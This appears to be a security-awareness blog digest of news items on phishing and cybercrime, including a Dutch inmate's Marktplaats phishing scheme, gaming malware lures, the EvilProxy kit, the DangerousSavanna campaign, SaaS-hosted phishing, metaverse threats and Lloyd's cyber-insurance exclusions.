Gallery

Dutch authorities have announced that an imprisoned scammer was running a phishing operation from his jail cell, Cybernews reports. The crook used four mobile phones to post malicious ads on Marktplaats, a popular Dutch classifieds site. The Northern Netherlands District Prosecutor’s Office said in a statement that the scammer targeted more than a thousand people over the course of a few months.

“In the summer of 2021, a few months after the 23-year-old suspect from Groningen was sentenced to 42 months in prison for large-scale cybercrime, the Public Prosecution Service was informed that a telephone had been found in his cell,” the statement said. “This investigation shows that this suspect from the PI was engaged in exactly the same offenses for which he was convicted: phishing and fraud. That same summer, another device was found in the suspect’s cell. And shortly afterwards device three that was found in his bird’s food and some time later a fourth device. All the phones found in the suspect’s cell contain the same thing: phishing and fraud. On his phone were more than 1000 conversations that he had on marktplaats, trying to get people to click on a link.”

The authorities have also accused a 22-year-old man from the Netherlands of assisting in the campaign.

“The phishing fraud consisted of enticing buyers on Marktplaats to transfer 0.01 euros via a payment link, after which login details of these victims were obtained,” the statement continued. “With this, it was possible to log into the victims’ bank account and money was debited, transferred or goods ordered online. The form of friend-in-emergency fraud was also applied, whereby you pretend to be the victim’s acquaintance via Whatsapp, after which he is persuaded to transfer money. The 23-year-old suspect has made at least 16 victims in this way who have reported this. In total, it would be more than 34,000 euros. The 22-year-old man gave the necessary instructions and phishing panels for this, but was also involved in logging into the bank accounts.”

Researchers at Kaspersky have found that the vast majority of gaming-related malware lures are targeted at Minecraft players. Roblox came in at a distant second, and the researchers note that both of these games are frequently played by children, “who have much less knowledge of cybersecurity due to a lack of experience.”

“When downloading the games from untrustworthy sources, players may receive malicious software that can gather sensitive data like login information or passwords from the victim’s device; and in an attempt to download a desired game for free, find a cool mod or cheat, gamers can actually lose their accounts or even money,” the researchers write. “The research revealed an increase in attacks using malicious software that steals sensitive data from infected devices. It included such verdicts as Trojan-PSW (Password Stealing Ware) which gathers victims’ credentials, Trojan-Banker which steals payment data, and Trojan-GameThief which collects login information for gaming accounts.”

Unsurprisingly, most gaming-related malware lures target some of the most popular games.

“Attackers often purposely seek to spread threats under the guise of games and game series that either have a huge permanent audience (such as Roblox, FIFA, or Minecraft) or were recently released,” the researchers write. “We found that from July 1, 2021 through June 30, 2022, the TOP 5 game titles that cybercriminals used as a lure to distribute secret-stealing software included Valorant, Roblox, FIFA, Minecraft, and Far Cry.”

Attackers also use phishing sites to compromise accounts for multiplayer games that have in-game currency, such as Grand Theft Auto 5 and Counter-Strike.

“This year, cybercriminals have learned to mimic the entire interfaces of the in-game stores for many popular game titles,” the researchers write. “The most notable examples include fake marketplaces launched under the names of CS:GO, PUBG and Warface, which are popular esports disciplines. To achieve better results, players need a decent arsenal of weapons and artifacts that are available in the in-game stores. The scammers created fraudulent stores by copying the appearance of the actual in-game marketplaces to fool players, with the final aim of taking over their accounts or stealing their money.”

New-school security awareness training can teach your employees to follow security best practices so they can avoid falling for social engineering attacks. And they can pass on what they learned to their children, too.

New data from PwC provides insight into what aspects of the business are executives focused on, worried about, and seeing as future challenges as they look to manage business risk.

While the majority (83%) of executives are focusing their business strategy on growing the business, the latest data from PwC’s Pulse Survey: Managing Business Risks shows cybersecurity remains a material risk to achieving the desired growth.

According to the report:

• Cybersecurity risk was seen as the #1 business risk, with 40% of executives citing it as a serious risk and another 38% calling it a moderate risk
• 51% of board members cited cybersecurity as a serious risk, indicating that boards may be increasingly aware of the problem and seeing addressing it as part of the overall business strategy
• 49% of executives say their organization is increasing investments in cybersecurity and privacy, with only 5% planning on decreasing investments

The overall outcome for cybersecurity from this report’s findings is that businesses are aware and are making strategic investments. At the same time, 70% of organizations are looking at ways to expand permanent remote work options – something we’ve seen also brings with it bad cyber habits and additional cyber risk – making it necessary for organizations to invest in Security Awareness Training to ensure, even while working at home, users remain vigilant against increased cyberattacks.

Researchers at Resecurity have discovered a new Phishing-as-a-Service (PhaaS) platform called “EvilProxy” that’s being offered on the dark web. EvilProxy is designed to target accounts on a variety of platforms, including Apple, Facebook, GoDaddy, GitHub, Google, Dropbox, Instagram, Microsoft, Twitter, Yahoo, Yandex.

Notably, EvilProxy has the ability to steal session cookies, which allows it to access accounts without needing a username, password, or multifactor authentication (MFA) tokens.

“EvilProxy actors are using Reverse Proxy and Cookie Injection methods to bypass 2FA authentication – proxyfying victim’s session,” the researchers write. “Previously such methods have been seen in targeted campaigns of APT and cyberespionage groups, however now these methods have been successfully productized in EvilProxy which highlights the significance of growth in attacks against online-services and MFA authorization mechanisms…. The reverse proxy concept is simple: the bad actors lead victims into a phishing page, use the reverse proxy to fetch all the legitimate content which the user expects including login pages – it sniffs their traffic as it passes through the proxy. This way they can harvest valid session cookies and bypass the need to authenticate with usernames, passwords and/or 2FA tokens.”

EvilProxy is being offered for $400 per month, and requires customers to undergo a vetting process to prevent researchers from getting their hands on it. The kit also has extensive anti-analysis features.

Resecurity adds that the platform is also very easy to use, further lowering the bar for inexperienced attackers to carry out sophisticated phishing attacks.

“The portal of EvilProxy contains multiple tutorials and interactive videos regarding the use of the service and configuration tips,” the researchers write. “Being frank – the bad actors did a great job in terms of the service usability, and configurability of new campaigns, traffic flows, and data collection.”

Researchers at Check Point have discovered a spear phishing campaign dubbed “DangerousSavanna” that’s targeting financial entities in at least five African countries.

The campaign has been running for at least two years, and has targeted organizations in Ivory Coast, Morocco, Cameroon, Senegal, and Togo. The researchers believe the campaign is financially motivated.

“DangerousSavanna targets medium or large finance-related enterprises which operate across multiple African countries,” the researchers write.

“The companies that belong to these financial groups provide a wide range of banking products and services, and include not only banks but also insurance companies, microfinancing companies, financial holding companies, financial management companies, financial advisory services, etc. Despite the relatively low complexity of their tools, we observed the signs that might point out that the attackers managed to infect some of their targets. This was most likely due to the actors’ persistent attempts at infiltration. If one infection chain didn’t work out, they changed the attachment and the lure and tried targeting the same company again and again trying to find an entry point. With social engineering via spear-phishing, all it takes is one incautious click by an unsuspecting user.”

The phishing emails are written in French, the primary or official language of the targeted countries.

“The infection starts with spear-phishing emails written in French, usually sent to several employees of the targeted companies, all of which are medium to large financial groups in French-speaking Africa,” the researchers write. “In the early stages of the campaign, the phishing emails were sent using Gmail and Hotmail services. To increase their credibility, the actors began to use lookalike domains, impersonating other financial institutions in Africa such as the Tunisian Foreign bank, Nedbank, and others. For the last year, the actors also used spoofed email addresses of a local insurance advisory company whose domain doesn’t have an SPF record.”

Check Point believes that the attackers will continue improving their social engineering techniques and malware.
“This campaign, which has been running for almost two years, often changes its tools and methods, demonstrating the actors’ knowledge of open-source tools and penetration testing software,” the researchers write. “We expect that this campaign, which shows no signs of stopping or slowing down, will continue to adjust its operations and methods with an eye to maximizing its financial gain.”

As threat actors look for ways to evade detection by security solutions, the use of cloud applications has seen a material jump in the last 12 months, according to new data.

While we see plenty of cyberattacks that utilize dark infrastructure to accomplish their malicious activities, more and more we’re seeing a trend where threat actors are taking advantage of web-based application platforms to utilize their legitimacy to ensure phishing email delivery all the way to the Inbox.

In the latest report from Palo Alto Network’s Unit42, Legitimate SaaS Platforms Being Used to Host Phishing Attacks, we find that the increases are far greater than expected. According to the report, the following types of SaaS platforms were included in their analysis of phishing URLS:

Source: Palo Alto

What they found is a staggering and continually increasing trend of misuse of these platforms to host phishing URLS. In the 12 months between June of 2021 and June 2022, the number of malicious phishing URLs increased 1,100%.

Source: Palo Alto

According to the report, these sites were used for a number of purposes, including:

• Design / Prototyping
• Website Building
• Form Building

The end result is websites that are made to look like legitimate impersonated brands for attacks focused on both credential theft and fraud.

And, given the “hockey stick” chart above, organizations should expect this to continue, making it more difficult to spot phishing emails via security solutions. This makes it necessary to employ users to play a role in identifying and stopping phishing emails – something they’ll need to be educated on via Security Awareness Training to do it effectively.

ARN just reported: “The metaverse is seen by many companies as a great business opportunity and for new ways of working. Security provider Trend Micro, however, warns in a recent research report that cyber criminals could misuse the technology for their own purposes.

Security researchers predict that a kind of darknet structure could emerge there, similar to today’s Internet. The machinations of the cyber gangsters could even take place in protected rooms that can only be reached from a specific physical location and via valid authentication tokens. This would make their underground marketplaces inaccessible to law enforcement agencies. In fact, it could be years before the police can operate effectively in the metaverse.

Likely metaverse threat scenarios

The researchers warn that the Darkverse could become a platform for cyber threats, including:

• Attackers target non-fungible tokens (NFTs), an increasingly popular means of defining property in the metaverse, for phishing, ransomware, fraud, and other attacks.
• Criminals use the metaverse to launder money using overpriced virtual real estate and NFTs.
• Criminal and state actors create manipulative narratives that reach vulnerable and receptive groups. Social engineering, propaganda and fake news have profound implications in a cyber-physical world.
• Privacy is redefined. Operators of metaverse-like rooms have unprecedented insight into the actions of the users. Privacy as we know it no longer exists there.

“The metaverse is a multi-billion-dollar, high-tech vision that will define the next internet age. While we don’t know exactly how it’s shaping up, we already need to start thinking about how it might be exploited by threat actors and how we can build our own to protect society in a meaningful way.” comments Udo Schneider, IoT security evangelist at Trend Micro.

“In view of the high costs and legal challenges, law enforcement agencies will have difficulties monitoring the metaverse in general in the first few years,” Schneider is convinced. He demands: “The IT security industry must intervene now.” Otherwise, “a new Wild West would develop on our digital front door.”

As cyber insurers evolve their understanding of the cyber attack landscape, who’s responsible, and what’s at stake, a logical next step is taken by Lloyd’s to better isolate what is covered and what isn’t.

It’s inevitable; cyberinsurers can’t blindly just cover every kind of cyberattack and pay out every time one happens – there are too many to count, and often times it’s the insured’s own employees that enabled an attack potentially covered by a cyber insurance policy.

A new market bulletin put out by Lloyd’s of London makes it clear that very specific types of attacks – those that are essentially akin to cyber warfare – are not going to be covered.

“We are therefore requiring that all standalone cyber-attack policies…must include, unless agreed by Lloyd’s, a suitable clause excluding liability for losses arising from any state backed cyber-attack.”

Some of the requirements around this exclusion includes:

• Losses arising from a war
• Losses arising from state backed cyber-attacks the “that (a) significantly impair the ability of a state to function or (b) that significantly impair the security capabilities of a state.”

It also mentions that coverage with such an exclusion must also:

• Specify whether computer systems outside an affected state (presumably within the context of the requirements above) are excluded or not
• Provide an agreement between Lloyd’s and the insured as to “how any state backed cyber attack will be attributed to one or more states”

This puts more of the burden of having a strong protective cyberstance all the more important – one that includes Security Awareness Training as part of a layered defense to prevent cyber attacks from ever gaining entrance to a victim network and wreaking havoc – state actor or not.